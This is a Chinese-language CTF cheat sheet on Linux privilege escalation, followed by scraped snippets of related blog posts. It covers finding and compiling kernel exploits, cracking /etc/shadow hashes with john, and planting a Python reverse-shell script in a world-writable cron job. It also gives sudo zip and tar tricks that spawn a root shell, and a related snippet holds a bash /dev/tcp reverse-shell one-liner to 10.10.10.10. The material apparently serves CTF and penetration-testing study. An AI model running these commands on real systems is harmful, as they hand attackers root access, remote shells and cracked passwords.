CTF-内核漏洞提权

1. 内核漏洞提权

  查看发行版本:  cat /etc/issue  cat /etc/*-release

  查看内核版本:  uname -a

  寻找内核溢出代码:  searchspoit 发行版本 内核版本

  上传内核溢出代码,编译执行  gcc xxx.c -o exploit

                  chmod +x exploit

                  ./exploit

2. 明文root密码提取

  大多linux系统的密码都和/etc/passwd和/etc/shadow这两个配置文件相关

  passwd里储存了用户,shadow里是密码的hash。passwd全用户可读,root可写。shadow仅root读写。

  例如

      /etc/passwd /etc/shadow

      unshadow passwd shadow > cracked

      john cracked

3. 计划任务

  一般定时执行的任务由crontab管理,非root用户不可列出,但 /etc/内系统的计划任务可以被列出。

  如果其中一个脚本配置成任意用户可写,就可以修改脚本回连rootshell

  攻击机启动nc监听端口 nc -nlvp port

  脚本代码:

      #!/user/bin/python

      import os,subprocess,socket

      s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

      s.connect(("攻击机IP","攻击机监听端口"))

      os.dup2(s.fileno(),0)

      os.dup2(s.fileno(),1)

      os.dup2(s.fileno(),2)

      p=subprocess.call(["/bin/sh","-i"])

4. 密码复用

  模拟终端设备:

    python -c‘import pty;pty.spawn("/bin/sh")‘

  使用sudo -l 查看当前用户可以使用root提权的命令信息;

  利用zip提权

    touch exploit

    sudo -u root zip exploit.zip exploit-T -unzip-command="sh -c /bin/bash"

  利用tar提权

    sudo -u root tar cf /dev/null exploit -checkpoint -checkpoint=1 --checkpoint-action=" /bin/bash"

原文地址:https://www.cnblogs.com/Crux614/p/11518868.html

时间: 2024-11-06 21:08:46

CTF-内核漏洞提权的相关文章

小白日记24:kali渗透测试之提权(四)--利用漏洞提权

利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一.实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/library/security/ms11-080 1.通过searchsploit命令查找漏洞 [注:查找漏洞的命令行窗口要能完全显示Title和Path] #有python和ruby两种漏洞利用代码,可根据自己喜好选择,本章选择python 2.通过Sandi查找 查看漏洞利用代码的描述 #通过Afd.sy

Linux下漏洞提权

Linux下的漏洞提权 linux下一般都是系统漏洞提权,分为以下几个步骤: 提权 反弹shell 本地:nc -l -p 8000 目标机器:/bin/bash -i >& /dev/tcp/10.10.10.10/8000 0>&1 实例 1.得到系统版本号 centos 7 local root 2.找到对应的exp 反弹shell 目标机运行  本机hacker 提权 下载exp源码:编译源码:执行exp 权限变成root

利用linux漏洞提权

提权就是让普通用户拥有超级用户的权限. 本次试验漏洞适用于RHELt或CenOS系列5~6系列所有版本.主要利用/tmp/目录和/bin/ping命令的权限漏洞进行提权.     试验环境:腾讯云CentOS6.8     内核:2.6.32-642.6.2.el6.x86_64 1.查看系统环境 2.创建普通用户进行权限测试 3.开始提权操作     写一段C语言,用于提权     提权成功 最终执行完命令之后,可以看到执行权限变成了root,提权成功.

[EXP]CVE-2019-0803 Win32k漏洞提权工具

0x000 漏洞信息CVE-2019-0803 | Win32k 特权提升漏洞发布时间: 2019-04-09当 Win32k 组件无法正确处理内存中的对象时,Windows 中存在特权提升漏洞.成功利用此漏洞的攻击者可以在内核模式中运行任意代码.攻击者可随后安装程序:查看.更改或删除数据:或者创建拥有完全用户权限的新帐户.若要利用此漏洞,攻击者首先必须登录到系统.然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统. 0x001 影响版本 Microsoft Win

Linux内核本地提权漏洞(CVE-2019-13272)

漏洞描述 kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve(可能允许攻击者控制). 一个影响因素是对象寿命问题(也可能导致恐慌). 另一个影响因素是将ptrace关系标记为特权,这可以通过(例如)Polkit的pkexec帮助程序与PTRACE_TRACEME进行利用.获取root权限. 影响版本 Linux Kernel < 5

Redhat利用漏洞提权

漏洞试用系统:redhat 5-6通用 一.利用/tmp拥有777的权限 在/tmp下创建一个exploit目录 ln   /bin/ping(ping命令的权限很特殊是S,可以在普通用户使用这个命令的时候瞬间拥有这个命令的属主权限,这里是root) ln /bin/ping  /tmp/exploit/target exec  3<  /tmp/exploit/target rm  -rf  /tmp/exploit/ 二.vim编写一段C语言程序(文件名payload.c) void  __

linux 系统漏洞提权

1.先用普通用户登录 su - user1 2.建立目录 mkdir /tmp/exploit/ 3.利用Ping命令来建立硬链接 ln /bin/ping /tmp/exploit/target 查看权限 [[email protected] exploit]$ ll total 40 -rwsr-xr-x. 2 root root 37928 Nov 12  2010 target 4. exec 3< /tmp/exploit/target ll /proc/$$/fd/3   ($$:当

Linux提权:从入门到放弃

日站就要日个彻底.往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面.Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置.一下是我总结的一些提权方法. 几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏洞是我们几乎最先想到的提权方法.通杀的内核漏洞是十分少见的,因而我们应该先对系统相关

内核漏洞,任意地址写任意数据模型

实验环境 xp sp3 此实验将一个不常用的内核函数置0,然后R3申请了0地址的指针,将shellcode拷到此内存,内核并没有做ProbeForRead /Write检查 直接对传入的数据进行了修改,造成了任意地址写任意数据漏洞 ,提权了R3程序为system权限 R3代码 主要获得一个函数的地址,将函数地址传入R0 R0将此函数地址置0,然后R3申请了一个0地址,将shellcode拷到了申请的内存中,然后调用被置0的函数,触发了shellcode // exploit.cpp : Defi